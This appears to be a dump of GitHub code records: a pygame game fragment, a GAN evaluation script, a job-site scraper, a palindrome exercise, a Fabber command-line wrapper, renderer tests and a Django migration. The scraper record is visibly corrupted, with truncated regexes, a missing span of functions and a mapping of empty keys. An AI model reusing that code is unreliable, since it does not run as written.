True:\n # Watch for the keyboard or mouse events\n gf.check_events(ai_setting, screen, aliens, ship, bullets, stats, sb, play_button)\n\n # check for game active\n if stats.game_active:\n # Changing ship position \n ship.update()\n\n # fire bullets\n gf.update_bullets(ai_setting, screen, ship, aliens, bullets, stats, sb)\n\n # move alien \n gf.update_aliens(ai_setting, stats, sb, screen, ship, aliens, bullets)\n \n # Update scren element - bg color, ship position, flip screen\n gf.update_screen(ai_setting, screen, ship, bullets, aliens, stats, sb, 
play_button)\n\n\nrun_game()","repo_name":"pratikv06/Python-Crash-Course","sub_path":"pygame/alien_invasion_run.py","file_name":"alien_invasion_run.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"29078546375","text":"import torch\nimport torchvision\nfrom utils import *\nfrom config import get_parameters\nfrom PIL import Image\nfrom torchvision.utils import save_image\nfrom cal_FID import main as FID_cal\nimport os\nfrom Dataset import GAN_data\nimport random\n\nfrom SAGAN import Generator_SAGAN\n\nload_path = './checkpoints/hw2_face/SAGAN_model_G.pth'\nnum_output = 1000\n\ntorch.manual_seed(7414)\ntorch.cuda.manual_seed_all(7414)\nnp.random.seed(7414)\nrandom.seed(7414)\ntorch.backends.cudnn.deterministic = True\nos.makedirs('./generate_images/SAGAN', exist_ok=True)\nsave_path = './generate_images/SAGAN'\n\ngrid_image = torch.zeros((32, 3, 64, 64))\nargs = get_parameters()\n# Create the generator network.\nnetG = Generator_SAGAN(args.imsize, args.z_dim, args.g_conv_dim).cuda()\n# Load the trained generator weights.\nnetG.load_state_dict(torch.load(load_path))\nnetG.eval()\n\nnoise = torch.randn(num_output, args.z_dim).cuda()\n\n# Turn off gradient calculation to speed up the process.\nfor idx, latent_vector in enumerate(noise):\n\twith torch.no_grad():\n\t\tgenerated_img,_,_ = netG(latent_vector.unsqueeze(0))\n\t\tgenerated_img = denorm(generated_img.data)\n\t\tif idx <32:\n\t\t\tgrid_image[idx] = generated_img\n\t\tif idx == 32:\n\t\t\tsave_image(torchvision.utils.make_grid(grid_image), './generate_images/sample.png')\n\t# Display the generated image.\n\t\tsave_name = str(idx+1).zfill(4) + '.png'\n\t\tsave_image(generated_img, os.path.join(save_path, save_name))\n\ngenerated_image_data = GAN_data(save_path, 'test')\nIS, _ = inception_score(generated_image_data, cuda=True, resize=True)\nFID = FID_cal('../../hw2_data/face/test', save_path)\nprint('\\n FID:%.1f IS:%.2f' % (FID, IS))\n","repo_name":"come880412/DLCV2021_Fall","sub_path":"hw2/code/GAN/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14138926473","text":"import re\nimport csv\nimport requests\nimport jieba\nimport json\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\nfrom scipy.misc import imread\nfrom bs4 import BeautifulSoup\nfrom wordcloud import WordCloud, ImageColorGenerator\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\nimport warnings\nwarnings.filterwarnings('ignore')\n# 不发出警告\n\n\ndef get_one_page(cityid, keyword, pages):\n # 获取网页html内容并返回\n paras = {\n 'k': keyword,\n 'p': pages\n }\n\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3423.2 Safari/537.36',\n 'Host': 'www.shixiseng.com',\n 'Referer': 'https://www.shixiseng.com/gz',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n 'Accept-Encoding': 'gzip, deflate, br',\n 'Accept-Language': 'zh-CN,zh;q=0.9'\n }\n\n url = 'https://www.shixiseng.com/interns/c-{}_?'.format(cityid)\n\n # 获取网页内容,返回html数据\n response = requests.get(url, headers=headers, params=paras)\n # 通过状态码判断是否获取成功\n if response.status_code == 200:\n return response.text\n return None\n\n\ndef get_mpage(response):\n mpage = re.findall('.*?p=(\\d+)\">尾页.*?',response)[0]\n return int(mpage)\n\n\ndef 
get_detail_pageinfo(response):\n hrefs = re.findall('.*?= 4:\n lst.append('violet')\n\n plt.axis('equal') # 保证长宽相等\n plt.pie(s['job'],\n labels=s.index,\n colors=lst,\n autopct='%.2f%%',\n pctdistance=0.5,\n labeldistance=0.8,\n startangle=0,\n radius=1.3)\n name = city + \"_\" + keyword + '_' + '学历分布饼图.png'\n plt.savefig(name, dpi=300)\n\n\ndef salary_hist(data, city, keyword):\n data['low_salary'] = data['salary'].str.strip('/天').str.split('-').str[0]\n data['high_salary'] = data['salary'].str.strip('/天').str.split('-').str[1]\n data['mean_salary'] = ( data['low_salary'].astype(np.int) + data['high_salary'].astype(np.int) ) / 2\n s = data['mean_salary']\n mean = s.mean()\n\n plt.figure(figsize=(8, 4)) # 设置作图大小\n plt.title('工资分布图') # 图名\n plt.xlabel('salary') # x轴标签\n sns.distplot(s, hist=False, kde=True, rug=True,\n rug_kws={'color': 'y', 'lw': 2, 'alpha': 0.5, 'height': 0.1}, # 设置数据频率分布颜色\n kde_kws={\"color\": \"y\", \"lw\": 1.5, 'linestyle': '--'}) # 设置密度曲线颜色,线宽,标注、线形\n\n plt.axvline(mean, color='g', linestyle=\":\", alpha=0.8)\n plt.text(mean + 2, 0.005, 'salary_mean: %.1f元' %mean, color='g')\n # 绘制平均工资辅助线\n\n name = city + \"_\" + keyword + '_' + '工资分布直方图.png'\n plt.savefig(name, dpi=300)\n\n\ndef main(city, keyword, pages):\n f_cityid = open('cityid_list.json','r', encoding ='utf8')\n data_id = f_cityid.read()\n data_id = json.loads(data_id)\n cityid = data_id[city]\n\n csv_filename = 'sxs' + city +'_' +keyword +'.csv'\n txt_filename = 'sxs' + city + '_' + keyword + '.txt'\n headers = ['job','salary','city','education','workday','worktime','job_good','job_detail',\n 'company_pic','company_name','company_scale','company_class']\n write_csv_headers(csv_filename, headers)\n n = 0\n\n response = get_one_page(cityid, keyword, 1)\n mpage = get_mpage(response)\n if pages >= mpage:\n pages = mpage\n\n for i in tqdm(range(pages)):\n # 获取该页中的所有职位信息,写入csv文件\n i = i + 1\n response = get_one_page(cityid, keyword, i)\n\n hrefs = get_detail_pageinfo(response)\n for href in hrefs:\n n += 1\n response_detail = get_detail_page(href)\n items = parse_detail_info(response_detail)\n\n pattern = re.compile(r'[一-龥]+') # 清除除文字外的所有字符\n data = re.findall(pattern, items['job_detail'])\n write_txt_file(txt_filename, ''.join(data)) # 不能直接写data,此时的data是列表格式\n write_csv_rows(csv_filename, headers, items)\n print('已录入 %d 条数据' % n)\n\n content = read_txt_file(txt_filename)\n segment = jieba.lcut(content)\n words_df = pd.DataFrame({'segment': segment})\n wordcloud(words_df, keyword, city)\n\n data_csv = read_scv(csv_filename)\n education_pie(data_csv, city, keyword)\n salary_hist(data_csv, city, keyword)\n\n\nif __name__ == '__main__':\n # 手动输入解密映射,需要时自助更新\n mapping = {'': '0', '': '1', '': '2', '': '3', '': '4',\n '': '5', '': '6', '': '7', '': '8', '': '9'}\n\n '''\n 注意:\n 1、main()参数输入\n 第一个参数 :工作城市(小城市搜索不到会报错,可查看 cityid_list 文档里可搜索的城市)\n 第二个参数 :岗位关键词\n 第三个参数 :爬取的岗位网页页数,一页有10个岗位信息\n 2、云图热词生图\n 可更换图片,注意图片名字不变\n 3、停止词\n 云图生成的热词经过‘stopwords’过滤掉不必要的词语,可按需要自助添加删减\n '''\n main('广州', '数据分析', 6)\n","repo_name":"BaiDong-QuQ/py-demo","sub_path":"shixiseng.py","file_name":"shixiseng.py","file_ext":"py","file_size_in_byte":10658,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"5987494852","text":"#팰린드롬수\n# while 1:\n# ck = False\n# numlist = list(input())\n# if len(numlist) == 1:\n# if numlist[0] == '0':\n# break\n# print(\"yes\")\n# else:\n# for i in range(0,len(numlist)//2):\n# if numlist[i] == numlist[len(numlist)-(i+1)]:\n# ck = True\n# else:\n# ck = 
False\n# print(\"no\")\n# break\n# if ck == True:\n# print(\"yes\")\n\n#다른 풀이\n#문자열 슬라이싱 [start:stop:step] = step부분이 음수이면 뒤집음\nwhile True:\n n = input()\n\n if n =='0':\n break\n if n == n[::-1]: #문자열을 뒤집음!\n print(\"yes\")\n else:\n print(\"no\")","repo_name":"seoyoung1215/AD-NeRF_sy_legacy","sub_path":"1259.py","file_name":"1259.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"265246087","text":"\"\"\"\nPYFAB API using Fabber command line tool(s)\n===========================================\n\nThis API uses Fabber command line tools, run within temporary\ndirectories, to implement the required functions. For short\nruns this is likely to be slower than the shared-library\nbased API however it can be used when the shared library is not\navailable or there are binary compatibility problems.\n\nNote that Fabber command line tools typically come as one\nper model library, i.e. ``fabber_asl`` which contains a number\nof ASL-MRI related models, ``fabber_cest`` which contains the\nCEST-MRI model, etc. The base ``fabber`` executable is not\nterribly useful in itself - it only includes generic linear\nand polynomial models.\n\"\"\"\nfrom __future__ import unicode_literals, print_function\n\nimport collections\nimport tempfile\nimport subprocess\nimport shutil\nimport re\nimport os\nimport glob\nimport warnings\n\nimport six\nimport numpy as np\nimport nibabel as nib\n\nfrom fsl.utils.platform import platform as fslplatform\ntry:\n # Not all versions of fslpy support WSL and since this is not\n # compulsary to use pyfab we don't require it\n from fsl.utils.run import wslcmd\n FSLPY_HAVE_WSL=True\nexcept ImportError:\n FSLPY_HAVE_WSL=False\n\nfrom .api import FabberApi, FabberException, FabberRun\n\n# Maximum size allowed in Fabber logfile to avoid multiple errors\n# eating all the memory\nMAX_LOG_SIZE = 100000\n\ndef _progress_stdout_handler(progress_cb):\n \"\"\"\n :return: stdout handler which looks for percentage done reports\n and makes an appropriate call to the progress callback.\n\n The handler uses a regex to look for a 'percentage'\n output and calls the progress handler with the number\n found and a 'total' of 100.\n \"\"\"\n percent_re = re.compile(r\"^(\\d+)%?$\")\n def _handler(line):\n match = percent_re.match(line)\n if match:\n progress_cb(int(match.group(1)), 100)\n return _handler\n\nclass FabberClException(FabberException):\n \"\"\"\n Exception originating from the command line\n\n We try to read the logfile and also attempt to\n determine the message from the stdout\n \"\"\"\n def __init__(self, stdout=\"\", returncode=-1, outdir=None, log=\"\"):\n \"\"\"\n :param stdout: Standard output/error combined\n :param returncode: Return code from executable\n :param outdir: Output directory (to read logfile if possible)\n \"\"\"\n grabnext = False\n msg = \"\"\n for line in stdout.splitlines():\n if line == \"\":\n continue\n elif grabnext:\n msg = line.strip()\n grabnext = False\n elif \"exception\" in line.lower():\n grabnext = True\n log = log\n if outdir:\n logfile = os.path.join(outdir, \"logfile\")\n if os.path.exists(logfile):\n with open(logfile, \"r\") as logfile:\n log = logfile.read()\n\n FabberException.__init__(self, msg, returncode, log)\n\n # Required to make unpickling work\n # see https://stackoverflow.com/questions/41808912/cannot-unpickle-exception-subclass\n self.args = (stdout, returncode, None, log)\n\nclass FabberClRun(FabberRun):\n \"\"\"\n Run output from 
the command line API\n\n Sets the attributes log, timestamp, timestamp_str and data\n \"\"\"\n\n def __init__(self, outdir, options, extra_outputs, max_log_size=MAX_LOG_SIZE):\n \"\"\"\n :param outdir: Directory containing Fabber output\n \"\"\"\n with open(os.path.join(outdir, \"logfile\"), \"r\") as logfile:\n log = logfile.read(max_log_size)\n\n data = {}\n alphanum = \"[a-zA-Z0-9_]\"\n regexes = []\n nii = None\n\n if \"save-mean\" in options:\n regexes.append(re.compile(r\".*[/\\\\](mean_%s+)\\..+\" % alphanum))\n if \"save-std\" in options:\n regexes.append(re.compile(r\".*[/\\\\](std_%s+)\\..+\" % alphanum))\n if \"save-var\" in options:\n regexes.append(re.compile(r\".*[/\\\\](var_%s+)\\..+\" % alphanum))\n if \"save-zstat\" in options:\n regexes.append(re.compile(r\".*[/\\\\](zstat_%s+)\\..+\" % alphanum))\n if \"save-noise-mean\" in options:\n regexes.append(re.compile(r\".*[/\\\\](noise_means)\\..+\"))\n if \"save-noise-std\" in options:\n regexes.append(re.compile(r\".*[/\\\\](noise_stdevs)\\..+\"))\n if \"save-free-energy\" in options:\n regexes.append(re.compile(r\".*[/\\\\](freeEnergy)\\..+\"))\n regexes.append(re.compile(r\".*[/\\\\](freeEnergyHistory)\\..+\"))\n if \"save-mvn\" in options:\n regexes.append(re.compile(r\".*[/\\\\](finalMVN)\\..+\"))\n if \"save-model-fit\" in options:\n regexes.append(re.compile(r\".*[/\\\\](modelfit)\\..+\"))\n if \"save-residuals\" in options:\n regexes.append(re.compile(r\".*[/\\\\](residuals)\\..+\"))\n for output in extra_outputs:\n regexes.append(re.compile(r\".*[/\\\\](%s)\\..+\" % output))\n\n for fname in glob.glob(os.path.join(outdir, \"*\")):\n for regex in regexes:\n match = regex.match(fname)\n if match:\n nii = nib.load(fname)\n data[match.group(1)] = np.array(nii.get_fdata())\n\n FabberRun.__init__(self, data, log)\n\n # Assuming we managed to load some data at some point, use the NII header\n # as the reference for future saving of the data to an output directory\n if nii is not None:\n self.nii_header = nii.header.copy()\n\nclass FabberCl(FabberApi):\n \"\"\"\n Interface to Fabber using command line\n \"\"\"\n\n def __init__(self, core_exe=None, model_exes=None, **kwargs):\n FabberApi.__init__(self, core_exe=core_exe, model_exes=model_exes, **kwargs)\n\n if core_exe is not None and not os.path.isfile(self.core_exe):\n raise FabberException(\"Invalid core executable - file not found: %s\" % self.core_exe)\n\n self._model_groups = None\n self._models = None\n\n def get_methods(self):\n stdout = self._call(listmethods=True)\n return [line for line in stdout.splitlines() if line.strip()]\n\n def get_models(self, model_group=None):\n if self._model_groups is None:\n self._model_groups = {}\n self._models = {}\n for group in self.model_exes:\n group = group.lower()\n stdout = self._call(listmodels=True, model_group=group)\n self._models[group] = [line for line in stdout.splitlines() if line.strip()]\n for model in self._models[group]:\n self._model_groups[model] = group\n if model_group is not None:\n return self._models.get(model_group.lower(), [])\n else:\n return list(self._model_groups.keys())\n\n def get_options(self, generic=None, method=None, model=None):\n if generic is None:\n # For backwards compatibility - no params = generic\n generic = not method and not model\n\n ret, all_lines = [], []\n if method:\n stdout = self._call(help=True, method=method)\n lines = [line for line in stdout.splitlines() if line.strip()]\n ret.append(lines[0])\n all_lines += lines[1:]\n if model:\n stdout = self._call(help=True, model=model)\n 
lines = [line for line in stdout.splitlines() if line.strip()]\n ret.append(lines[0])\n all_lines += lines[1:]\n if generic:\n stdout = self._call(help=True)\n lines = [line for line in stdout.splitlines() if line.strip()]\n ret.append(lines[0])\n all_lines += lines[1:]\n\n opts = self._parse_options(all_lines)\n ret.insert(0, opts)\n return tuple(ret)\n\n def get_model_params(self, options):\n stdout = self._call(options, listparams=True, data_options=True)\n return [line for line in stdout.splitlines() if line.strip()]\n\n def get_model_param_descs(self, options):\n stdout = self._call(options, descparams=True, data_options=True)\n return self._parse_params(stdout.splitlines())\n\n def get_model_outputs(self, options):\n stdout = self._call(options, listoutputs=True, data_options=True)\n return [line for line in stdout.splitlines() if line.strip()]\n\n def model_evaluate(self, options, param_values, nvols, indata=None, output_name=\"\"):\n params = self.get_model_params(options)\n plist = []\n for param in params:\n if param not in param_values:\n raise FabberException(\"Model parameter %s not specified\" % param)\n else:\n plist.append(param_values[param])\n\n if len(param_values) != len(params):\n raise FabberException(\"Incorrect number of parameters: expected %i (%s)\" % (len(params), \",\".join(params)))\n\n params_file = self._write_temp_matrix(plist)\n data_file = None\n if indata is not None:\n data_file = self._write_temp_matrix(indata)\n\n stdout = self._call(options, evaluate=output_name, evaluate_nt=nvols,\n evaluate_params=params_file, evaluate_data=data_file, data_options=True)\n ret = []\n for line in [line for line in stdout.splitlines() if line.strip()]:\n try:\n ret.append(float(line))\n except ValueError:\n warnings.warn(\"Unexpected output: %s\" % line)\n return ret\n\n def run(self, options, progress_cb=None, **kwargs):\n if \"data\" not in options:\n raise ValueError(\"Main voxel data not provided\")\n\n max_log_size = kwargs.pop(\"max_log_size\", MAX_LOG_SIZE)\n if progress_cb is not None:\n stdout_handler = _progress_stdout_handler(progress_cb)\n else:\n stdout_handler = None\n\n outdir = None\n try:\n outdir = tempfile.mkdtemp(\"fabberout\")\n out_subdir = os.path.join(outdir, \"fabout\")\n extra_outputs = self.get_model_outputs(options)\n self._call(options, output=out_subdir, stdout_handler=stdout_handler, simple_output=True, data_options=True)\n return FabberClRun(out_subdir, self._normalize_options(options), extra_outputs, max_log_size)\n finally:\n if outdir is not None:\n shutil.rmtree(outdir)\n\n def _parse_options(self, lines):\n \"\"\"\n Parse option specifiers like:\n\n --save-mean [BOOL,NOT REQUIRED,NO DEFAULT]\n Output the parameter means.\n \"\"\"\n options = []\n current_option = {}\n option_regex = re.compile(r'--(.+)\\s\\[(.+),(.+),(.+)]')\n for line in lines:\n match = option_regex.match(line)\n if match:\n if current_option:\n current_option[\"description\"] = current_option[\"description\"][:-1]\n\n current_option = {\n \"name\" : match.group(1),\n \"type\" : match.group(2),\n \"optional\" : match.group(3) == 'NOT REQUIRED',\n \"default\" : match.group(4),\n \"description\" : \"\"\n }\n if current_option[\"default\"] == \"NO DEFAULT\":\n current_option[\"default\"] = \"\"\n else:\n current_option[\"default\"] = current_option[\"default\"].split(\"=\", 1)[1]\n\n options.append(current_option)\n elif current_option:\n desc = line.strip()\n if desc:\n current_option[\"description\"] += desc + \" \"\n\n return options\n\n def _call(self, 
options=None, stdout_handler=None, data_options=False, **kwargs):\n \"\"\"\n Call the Fabber executable\n \"\"\"\n indir = None\n try:\n if options is None:\n options = {}\n else:\n options = dict(options)\n options.update(kwargs)\n\n # Convert options to format expected by Fabber (e.g. _ -> -)\n options = self._normalize_options(options)\n\n # If required, write data options to temporary files\n if data_options:\n indir, options = self._process_data_options(options)\n\n # Get the correct executable for the model/model group required\n exe = self._get_exe(options)\n\n # Convert options to command line arguments\n cl_args = self._get_clargs(options)\n\n startupinfo=None\n if FSLPY_HAVE_WSL:\n if fslplatform.fslwsl:\n cl_args.insert(0, \"fabber\")\n cmdargs = wslcmd(exe, *cl_args)\n exe, cl_args = cmdargs[0], cmdargs[1:]\n startupinfo = subprocess.STARTUPINFO()\n startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW\n\n # Run the process and return stdout\n stdout = six.StringIO()\n process = subprocess.Popen([exe] + cl_args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, startupinfo=startupinfo)\n while 1:\n retcode = process.poll() # returns None while subprocess is running\n line = process.stdout.readline().decode('utf-8')\n stdout.write(line)\n stdout.write(\"\\n\")\n if stdout_handler is not None:\n stdout_handler(line)\n if line == \"\" and retcode is not None:\n break\n\n if retcode != 0:\n errmsg = stdout.getvalue()\n if self._debug:\n errmsg = exe + \" \" + \" \".join(cl_args) + \"\\n\" + errmsg\n raise FabberClException(errmsg, retcode, options.get(\"output\", \"\"))\n return stdout.getvalue()\n finally:\n if indir is not None:\n shutil.rmtree(indir)\n\n def _get_exe(self, options):\n \"\"\"\n Get the right Fabber exe to use\n \"\"\"\n if \"model_group\" in options or \"model-group\" in options:\n group = options.pop(\"model_group\", options.pop(\"model-group\", \"\")).lower()\n if group not in self.model_exes:\n raise ValueError(\"Unknown model group: %s\" % group)\n exe = self.model_exes[group]\n elif \"model\" in options:\n self.get_models()\n model = options[\"model\"]\n if model not in self._model_groups:\n raise ValueError(\"Unknown model: %s\" % model)\n exe = self.model_exes[self._model_groups[model]]\n elif self.core_exe is not None:\n exe = self.core_exe\n elif self._model_groups:\n exe = self.model_exes.values()[0]\n else:\n raise ValueError(\"No Fabber executable found\")\n return exe\n\n def _process_data_options(self, options):\n \"\"\"\n Identify options which need to be written to temporary files before Fabber\n can use them\n\n :return: Tuple of temp directory name, new options dict\n \"\"\"\n indir = tempfile.mkdtemp(\"fabberin\")\n try:\n options = dict(options)\n model_options = self.get_options(model=options.get(\"model\", None),\n method=options.get(\"method\", None),\n generic=True)[0]\n for key in list(options.keys()):\n if self.is_data_option(key, model_options):\n # Allow input data to be given as Numpy array, Nifti image or filename. 
It\n # must be passed to Fabber as a file name\n value = options.pop(key)\n if value is None:\n pass\n elif isinstance(value, six.string_types):\n options[key] = value\n elif isinstance(value, (int, float)):\n # Work around bug in some versions of fabber where some numeric options\n # are miscategorized as data options\n options[key] = str(value)\n elif isinstance(value, nib.Nifti1Image):\n options[key] = self._write_temp_nifti(value, indir)\n elif isinstance(value, np.ndarray):\n nii = nib.Nifti1Image(value, affine=np.identity(4))\n options[key] = self._write_temp_nifti(nii, indir)\n else:\n raise ValueError(\"Unsupported type for input data: %s = %s\" % (key, type(value)))\n\n elif self.is_matrix_option(key, model_options):\n # Input matrices can be given as Numpy arrays or sequences but must be\n # passed to fabber as file names\n value = options.pop(key)\n if value is None:\n pass\n elif isinstance(value, six.string_types):\n options[key] = value\n elif isinstance(value, (int, float)):\n # Work around bug in some versions of fabber where some numeric options\n # are miscategorized as matrix options\n options[key] = str(value)\n elif isinstance(value, (np.ndarray, collections.Sequence)):\n options[key] = self._write_temp_matrix(value, indir)\n elif isinstance(value, (int, float)):\n # Work around fabber_core bug where evaluate-nt is defined as a matrix\n options[key] = value\n else:\n raise ValueError(\"Unsupported type for input matrix: %s = %s\" % (key, type(value)))\n\n elif self.is_sequence_option(key, model_options):\n value = options.pop(key)\n if value is None:\n pass\n elif isinstance(value, (list, tuple)):\n for idx, val in enumerate(value):\n options[\"%s%i\" % (key, idx+1)] = val\n else:\n options[key] = value\n\n return indir, options\n except:\n shutil.rmtree(indir)\n raise\n\n def _get_clargs(self, options):\n \"\"\"\n Build command line arguments from options\n \"\"\"\n cl_args = []\n for key, value in options.items():\n if key:\n if value != \"\":\n cl_args.append(\"--%s=%s\" % (key, value))\n else:\n cl_args.append(\"--%s\" % key)\n\n return cl_args\n","repo_name":"physimals/pyfab","sub_path":"fabber/api_cl.py","file_name":"api_cl.py","file_ext":"py","file_size_in_byte":18713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34444717019","text":"from danger_python.generator.models import (\n ClassDefinition,\n EnumDefinition,\n PropertyDefinition,\n)\nfrom danger_python.generator.renderer import render_classes\n\n\ndef test_renderer_renders_definitions_correctly():\n \"\"\"\n Test that renderer renders definitions correctly.\n \"\"\"\n to_render = [\n EnumDefinition(\n name=\"SomeNiceEnum\",\n depends_on=set(),\n values=[(\"FIRST_VALUE\", \"first_value\"), (\"SECOND_VALUE\", \"second_value\")],\n ),\n ClassDefinition(\n name=\"APythonClass\",\n depends_on=set(),\n properties=[\n PropertyDefinition(\n name=\"string_val\",\n key=\"stringVal\",\n value_type=\"str\",\n known_type=True,\n ),\n PropertyDefinition(\n name=\"int_val\", key=\"intVal\", value_type=\"int\", known_type=True\n ),\n ],\n ),\n ]\n\n rendered_code = render_classes(to_render)\n\n assert rendered_code == (\n \"from enum import Enum\\n\"\n \"from typing import Any, List, Optional\\n\"\n \"\\n\"\n \"from pydantic import BaseModel\\n\"\n \"\\n\"\n \"\\n\"\n \"class SomeNiceEnum(Enum):\\n\"\n ' FIRST_VALUE = \"first_value\"\\n'\n ' SECOND_VALUE = \"second_value\"\\n'\n \"\\n\"\n \"\\n\"\n \"class APythonClass(BaseModel):\\n\"\n \" string_val: 
Optional[str]\\n\"\n \" int_val: Optional[int]\\n\"\n \"\\n\"\n \" class Config:\\n\"\n \" fields = {\\n\"\n ' \"string_val\": \"stringVal\",\\n'\n ' \"int_val\": \"intVal\",\\n'\n \" }\\n\"\n \"\\n\"\n \"\\n\"\n \"APythonClass.update_forward_refs()\"\n \"\\n\"\n \"\\n\"\n )\n\n\ndef test_renderer_handles_empty_classes_and_enums():\n \"\"\"\n Test renderer handles empty classes and enums.\n \"\"\"\n to_render = [\n EnumDefinition(name=\"EmptyEnum\", depends_on=set(), values=[]),\n ClassDefinition(name=\"EmptyClass\", depends_on=set(), properties=[]),\n ]\n\n rendered_code = render_classes(to_render)\n\n assert rendered_code == (\n \"from enum import Enum\\n\"\n \"from typing import Any, List, Optional\\n\"\n \"\\n\"\n \"from pydantic import BaseModel\\n\"\n \"\\n\"\n \"\\n\"\n \"class EmptyEnum(Enum):\\n\"\n \" pass\\n\"\n \"\\n\"\n \"\\n\"\n \"class EmptyClass(BaseModel):\\n\"\n \" pass\\n\"\n \"\\n\"\n \"\\n\"\n \"EmptyClass.update_forward_refs()\"\n \"\\n\"\n \"\\n\"\n )\n\n\ndef test_renderer_renders_custom_attributes_correctly():\n \"\"\"\n Test that renderer renders definitions correctly.\n \"\"\"\n to_render = [\n ClassDefinition(\n name=\"ClassWithUnknownTypes\",\n depends_on=set(),\n properties=[\n PropertyDefinition(\n name=\"first_prop\",\n key=\"firstProp\",\n value_type=\"FirstUnknownType\",\n known_type=False,\n ),\n PropertyDefinition(\n name=\"second_prop\",\n key=\"secondProp\",\n value_type=\"List[SecondUnknownType]\",\n known_type=False,\n ),\n PropertyDefinition(\n name=\"third_prop\",\n key=\"thirdProp\",\n value_type=\"Optional[ThirdUnknownType]\",\n known_type=False,\n ),\n PropertyDefinition(\n name=\"any_prop\", key=\"anyProp\", value_type=\"Any\", known_type=True\n ),\n ],\n ),\n ]\n\n rendered_code = render_classes(to_render)\n\n assert rendered_code == (\n \"from enum import Enum\\n\"\n \"from typing import Any, List, Optional\\n\"\n \"\\n\"\n \"from pydantic import BaseModel\\n\"\n \"\\n\"\n \"\\n\"\n \"class ClassWithUnknownTypes(BaseModel):\\n\"\n ' first_prop: Optional[\"FirstUnknownType\"]\\n'\n ' second_prop: Optional[List[\"SecondUnknownType\"]]\\n'\n ' third_prop: Optional[\"ThirdUnknownType\"]\\n'\n \" any_prop: Any\\n\"\n \"\\n\"\n \" class Config:\\n\"\n \" fields = {\\n\"\n ' \"first_prop\": \"firstProp\",\\n'\n ' \"second_prop\": \"secondProp\",\\n'\n ' \"third_prop\": \"thirdProp\",\\n'\n ' \"any_prop\": \"anyProp\",\\n'\n \" }\\n\"\n \"\\n\"\n \"\\n\"\n \"ClassWithUnknownTypes.update_forward_refs()\"\n \"\\n\"\n \"\\n\"\n )\n\n\ndef test_renderer_aliases_properties():\n \"\"\"\n Test that renderer aliases properties.\n \"\"\"\n to_render = [\n ClassDefinition(\n name=\"ClassWithAliases\",\n depends_on=set(),\n properties=[\n PropertyDefinition(\n name=\"self\", key=\"self\", value_type=\"str\", known_type=True\n ),\n PropertyDefinition(\n name=\"from\", key=\"from\", value_type=\"int\", known_type=True\n ),\n PropertyDefinition(\n name=\"non_aliased\",\n key=\"nonAliased\",\n value_type=\"Optional[str]\",\n known_type=True,\n ),\n ],\n ),\n ]\n\n rendered_code = render_classes(to_render)\n\n assert rendered_code == (\n \"from enum import Enum\\n\"\n \"from typing import Any, List, Optional\\n\"\n \"\\n\"\n \"from pydantic import BaseModel\\n\"\n \"\\n\"\n \"\\n\"\n \"class ClassWithAliases(BaseModel):\\n\"\n \" self_: Optional[str]\\n\"\n \" from_: Optional[int]\\n\"\n \" non_aliased: Optional[str]\\n\"\n \"\\n\"\n \" class Config:\\n\"\n \" fields = {\\n\"\n ' \"self_\": \"self\",\\n'\n ' \"from_\": \"from\",\\n'\n ' \"non_aliased\": 
\"nonAliased\",\\n'\n \" }\\n\"\n \"\\n\"\n \"\\n\"\n \"ClassWithAliases.update_forward_refs()\"\n \"\\n\"\n \"\\n\"\n )\n","repo_name":"danger/python","sub_path":"tests/generator/test_renderer.py","file_name":"test_renderer.py","file_ext":"py","file_size_in_byte":6128,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"54"} +{"seq_id":"44870333822","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.core.validators\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Camp',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('security', models.CharField(max_length=3, verbose_name='Bezpiecze\\u0144stwo obozu', choices=[(b'-3', '-3 - ob\\xf3z na dnie w\\u0105wozu'), (b'-2', '-2'), (b'-1', '-1'), (b'0', '0 - polana w lesie'), (b'1', '1'), (b'2', '2'), (b'3', '3 - opuszczona fortyfikacja na wzniesieniu')])),\n ('visibility', models.IntegerField(verbose_name='Widoczno\\u015b\\u0107 obozu', validators=[django.core.validators.MaxValueValidator(100), django.core.validators.MinValueValidator(1)])),\n ('amount_of_water_stored', models.DecimalField(verbose_name='Jednostki zebranej wody', max_digits=4, decimal_places=1)),\n ('amount_of_food_stored', models.DecimalField(verbose_name='Jednostki zebranego jedzenia', max_digits=4, decimal_places=1)),\n ('has_food_utensils', models.BooleanField(default=False, verbose_name='Utensylia do gotowania')),\n ('has_clean_clothes', models.BooleanField(default=False, verbose_name='Czyste ubrania')),\n ('has_real_beds', models.BooleanField(default=False, verbose_name='\\u0141\\xf3\\u017cka')),\n ('has_storage', models.BooleanField(default=False, verbose_name='Przestrze\\u0144 magazynowa')),\n ],\n options={\n 'verbose_name': 'Ob\\xf3z',\n 'verbose_name_plural': 'Obozy',\n },\n ),\n migrations.CreateModel(\n name='Camper',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=255, verbose_name='Imi\\u0119')),\n ('amount_of_water_needed', models.DecimalField(default=4, verbose_name='Jednostki dziennie zu\\u017cytej wody', max_digits=4, decimal_places=1)),\n ('amount_of_food_needed', models.DecimalField(default=1, verbose_name='Jednostki dziennie zu\\u017cytego jedzenia', max_digits=4, decimal_places=1)),\n ],\n options={\n 